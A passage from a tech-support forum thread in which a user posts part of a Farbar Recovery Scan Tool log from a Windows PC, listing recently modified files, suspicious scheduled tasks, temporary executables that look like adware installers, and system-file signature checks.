    2015-12-13 15:06 - 2015-12-13 15:06 - 00374903 _____ C:\Users\owner\Downloads\Athenas *** MH4G 0.81b.rar
    2015-12-11 09:48 - 2016-01-09 18:47 - 00000000 ____D C:\WINDOWS\Minidump
     
  25. Gitanjali

    Gitanjali TS Rookie Topic Starter Posts: 83

    ==================== One Month Modified files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2016-01-10 18:13 - 2013-08-22 05:36 - 00000000 ____D C:\Windows
    2016-01-10 18:06 - 2014-11-21 00:44 - 00863592 _____ C:\WINDOWS\system32\PerfStringBackup.INI
    2016-01-10 18:06 - 2013-08-22 05:36 - 00000000 ____D C:\WINDOWS\Inf
    2016-01-10 16:15 - 2015-04-08 11:24 - 00000000 ____D C:\Users\owner\AppData\Roaming\uTorrent
    2016-01-10 16:15 - 2015-04-08 11:23 - 00000000 ____D C:\Users\owner\AppData\Roaming\Spotify
    2016-01-10 16:15 - 2015-04-02 18:05 - 00000000 ____D C:\Program Files (x86)\Steam
    2016-01-10 16:15 - 2013-08-22 06:45 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
    2016-01-10 16:14 - 2015-01-20 17:04 - 00003594 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-3773202632-424774445-890114178-1001
    2016-01-10 16:10 - 2015-04-08 11:25 - 00000000 ____D C:\Users\owner\AppData\Local\Spotify
    2016-01-10 16:10 - 2015-03-31 11:26 - 00000000 ___RD C:\Users\owner\OneDrive
    2016-01-10 16:09 - 2015-03-30 19:02 - 00000916 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
    2016-01-10 16:09 - 2015-03-30 19:02 - 00000912 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
    2016-01-10 15:04 - 2015-09-16 07:26 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
    2016-01-10 14:56 - 2015-11-24 22:00 - 00001122 _____ C:\Users\Public\Desktop\OpenOffice 4.1.2.lnk
    2016-01-10 14:56 - 2015-10-26 15:43 - 00001112 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Voxal Voice Changer.lnk
    2016-01-10 14:56 - 2015-04-16 18:45 - 00002445 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
    2016-01-10 14:56 - 2015-04-16 18:28 - 00001163 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
    2016-01-10 14:56 - 2015-04-08 11:26 - 00000877 _____ C:\Users\owner\AppData\Roaming\Microsoft\Windows\Start Menu\µTorrent.lnk
    2016-01-10 14:56 - 2015-03-30 20:52 - 00002523 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Apple Software Update.lnk
    2016-01-10 14:56 - 2015-01-22 22:29 - 00001511 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
    2016-01-10 14:56 - 2013-08-22 07:36 - 00000000 ____D C:\WINDOWS\System
    2016-01-10 14:56 - 2012-10-09 15:00 - 00002423 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office.lnk
    2016-01-10 14:56 - 2012-10-09 14:53 - 00001923 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spotify.lnk
    2016-01-10 14:56 - 2012-09-03 08:23 - 00001673 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer User's Manual.lnk
    2016-01-10 14:56 - 2012-09-03 08:23 - 00001655 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer Quick Guide.lnk
    2016-01-10 14:56 - 2012-09-03 08:10 - 00002572 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WildTangent Games App - acer.lnk
    2016-01-10 14:55 - 2015-04-21 16:09 - 00000000 ____D C:\Program Files (x86)\SearchProtect
    2016-01-10 13:29 - 2013-08-22 05:25 - 00262144 ___SH C:\WINDOWS\system32\config\BBI
    2016-01-09 21:28 - 2015-03-12 16:27 - 00000000 ____D C:\Users\owner\AppData\Local\Deployment
    2016-01-09 21:15 - 2013-08-22 07:36 - 00000000 ____D C:\WINDOWS\system32\NDF
    2016-01-09 21:09 - 2015-07-20 16:05 - 00000000 ____D C:\Users\owner\AppData\Roaming\Skype
    2016-01-09 21:09 - 2015-04-09 16:09 - 00551936 ___SH C:\Users\owner\Desktop\Thumbs.db
    2016-01-09 19:42 - 2015-05-13 19:04 - 00000000 ____D C:\Users\owner\AppData\Local\ElevatedDiagnostics
    2016-01-09 19:02 - 2012-07-25 21:26 - 00000301 _____ C:\WINDOWS\win.ini
    2016-01-09 18:47 - 2015-01-23 01:16 - 00000000 ___DC C:\WINDOWS\Panther
    2016-01-09 18:13 - 2015-06-07 15:45 - 00000000 ____D C:\Users\owner\AppData\Roaming\Curse Client
    2016-01-09 18:00 - 2015-06-07 13:52 - 00000000 ____D C:\Users\owner\AppData\Local\NexonLauncher
    2016-01-09 14:49 - 2015-02-26 12:13 - 00003910 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{59AA9515-0EFB-4314-9DA6-B2B84CDB5218}
    2016-01-08 14:02 - 2012-07-25 23:59 - 00000000 ____D C:\WINDOWS\CbsTemp
    2016-01-07 22:29 - 2013-08-22 07:36 - 00000000 ___HD C:\Program Files\WindowsApps
    2016-01-07 22:29 - 2013-08-22 07:36 - 00000000 ____D C:\WINDOWS\AppReadiness
    2016-01-06 00:14 - 2015-04-21 19:15 - 00000291 _____ C:\Users\owner\AppData\Roaming\WB.CFG
    2016-01-04 22:00 - 2015-01-22 22:26 - 00000000 ____D C:\Users\owner
    2016-01-03 21:49 - 2015-10-12 21:03 - 00000000 ____D C:\Users\owner\AppData\Roaming\TS3Client
    2016-01-03 21:42 - 2015-03-30 19:19 - 00000000 ____D C:\Users\owner\AppData\Roaming\Riot Games
    2016-01-03 20:37 - 2015-10-23 16:18 - 00000000 ____D C:\Users\owner\AppData\Local\Warframe
    2015-12-29 13:38 - 2013-08-22 06:44 - 00513128 _____ C:\WINDOWS\system32\FNTCACHE.DAT
    2015-12-28 17:04 - 2015-09-16 07:26 - 00003718 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater
    2015-12-27 17:22 - 2015-09-15 07:52 - 00000000 ____D C:\ProgramData\Hewlett-Packard
    2015-12-27 17:22 - 2012-09-03 08:15 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
    2015-12-25 17:54 - 2015-07-20 16:05 - 00000000 ____D C:\ProgramData\Skype
    2015-12-24 12:57 - 2015-04-02 18:19 - 00000000 ____D C:\Users\owner\AppData\Local\Steam
    2015-12-21 23:27 - 2015-07-20 16:06 - 00000000 ____D C:\Users\owner\AppData\Local\Skype
    2015-12-21 23:27 - 2015-07-20 16:05 - 00000000 ___RD C:\Program Files (x86)\Skype
    2015-12-21 23:16 - 2012-09-03 08:15 - 00000000 ____D C:\Program Files (x86)\McAfee
    2015-12-20 15:06 - 2015-10-26 15:43 - 00000000 ____D C:\WINDOWS\System32\Tasks\NCH Software
    2015-12-13 15:06 - 2015-10-26 15:43 - 00000000 ____D C:\ProgramData\NCH Software
    2015-12-13 15:06 - 2015-10-26 15:43 - 00000000 ____D C:\Program Files (x86)\NCH Software

    ==================== Files in the root of some directories =======

    2015-10-26 15:43 - 2015-10-26 15:43 - 0001167 _____ () C:\Users\owner\AppData\Roaming\trace_FilterInstaller.txt
    2015-10-26 15:43 - 2015-10-26 15:43 - 0000000 _____ () C:\Users\owner\AppData\Roaming\trace_FilterInstaller.txt-CRT.txt
    2015-04-21 19:15 - 2016-01-06 00:14 - 0000291 _____ () C:\Users\owner\AppData\Roaming\WB.CFG
    2016-01-09 16:32 - 2016-01-09 16:32 - 0041472 _____ () C:\Users\owner\AppData\Local\Donelectronics.dat
    2016-01-09 16:32 - 2016-01-09 16:32 - 0028160 _____ () C:\Users\owner\AppData\Local\Donelectronics.exe
    2016-01-09 16:32 - 2016-01-09 16:32 - 0000187 _____ () C:\Users\owner\AppData\Local\Donelectronics.exe.config
    2015-05-13 22:14 - 2015-05-13 22:14 - 0274045 _____ () C:\Users\owner\AppData\Local\dsi1.dat
    2015-05-13 22:14 - 2015-05-13 22:14 - 0161916 _____ () C:\Users\owner\AppData\Local\dsi2.dat
    2015-09-22 08:49 - 2015-09-22 08:49 - 0000000 _____ () C:\Users\owner\AppData\Local\{F9A1F101-40FE-48E1-BEBF-FD740E21840E}
    2012-10-09 14:39 - 2012-10-09 14:39 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

    Files to move or delete:
    ====================
    C:\Windows\Tasks\{0B7F0947-7E7A-0B05-7E11-797A790F110F}.job
    C:\Windows\Tasks\{0D0F7F47-0B7A-097F-7E11-050A09041178}.job


    Some files in TEMP:
    ====================
    C:\Users\owner\AppData\Local\Temp\2A80.tmp.exe
    C:\Users\owner\AppData\Local\Temp\34EC.tmp.exe
    C:\Users\owner\AppData\Local\Temp\3F71.tmp.exe
    C:\Users\owner\AppData\Local\Temp\427B.tmp.exe
    C:\Users\owner\AppData\Local\Temp\63FD.tmp.exe
    C:\Users\owner\AppData\Local\Temp\6A02.tmp.exe
    C:\Users\owner\AppData\Local\Temp\8076.tmp.exe
    C:\Users\owner\AppData\Local\Temp\amisetup5102__15940.exe
    C:\Users\owner\AppData\Local\Temp\amisetup9783__15940.exe
    C:\Users\owner\AppData\Local\Temp\amzngtb.exe
    C:\Users\owner\AppData\Local\Temp\avg6A34.exe
    C:\Users\owner\AppData\Local\Temp\avgE955.exe
    C:\Users\owner\AppData\Local\Temp\B213.tmp.exe
    C:\Users\owner\AppData\Local\Temp\C512.tmp.exe
    C:\Users\owner\AppData\Local\Temp\C546.tmp.exe
    C:\Users\owner\AppData\Local\Temp\D8EB.tmp.exe
    C:\Users\owner\AppData\Local\Temp\DA3.tmp.exe
    C:\Users\owner\AppData\Local\Temp\DFF8.tmp.exe
    C:\Users\owner\AppData\Local\Temp\EB6C.tmp.exe
    C:\Users\owner\AppData\Local\Temp\FD40.tmp.exe
    C:\Users\owner\AppData\Local\Temp\Flashbeat_Setup.exe
    C:\Users\owner\AppData\Local\Temp\Looksafe_Setup.exe
    C:\Users\owner\AppData\Local\Temp\nsz1850.exe
    C:\Users\owner\AppData\Local\Temp\Opera_NI_stable.exe
    C:\Users\owner\AppData\Local\Temp\setup_766.exe
    C:\Users\owner\AppData\Local\Temp\SpOrder.dll
    C:\Users\owner\AppData\Local\Temp\TranDex.exe
    C:\Users\owner\AppData\Local\Temp\Uninstall.exe
    C:\Users\owner\AppData\Local\Temp\UninstallModule.exe
    C:\Users\owner\AppData\Local\Temp\Vivafind.exe
    C:\Users\owner\AppData\Local\Temp\Voldom.exe
    C:\Users\owner\AppData\Local\Temp\widgett.exe


    ==================== Bamital & volsnap =================

    (There is no automatic fix for files that do not pass verification.)

    C:\WINDOWS\system32\winlogon.exe => File is digitally signed
    C:\WINDOWS\system32\wininit.exe => File is digitally signed
    C:\WINDOWS\explorer.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
    C:\WINDOWS\system32\svchost.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
    C:\WINDOWS\system32\services.exe => File is digitally signed
    C:\WINDOWS\system32\User32.dll => File is digitally signed
    C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
    C:\WINDOWS\system32\userinit.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
    C:\WINDOWS\system32\rpcss.dll => File is digitally signed
    C:\WINDOWS\system32\dnsapi.dll
    [2015-01-23 12:05] - [2015-01-23 12:05] - 0657920 ____A (Microsoft Corporation) 261452CF5C52EB6514A005FDCC7EDA12

    C:\WINDOWS\SysWOW64\dnsapi.dll
    [2015-01-23 12:05] - [2015-01-23 12:05] - 0498688 ____A (Microsoft Corporation) 27EE78502A66B4B9E4BD66C5FD081B59

    C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed


    LastRegBack: 2016-01-03 06:38

    ==================== End of FRST.txt ============================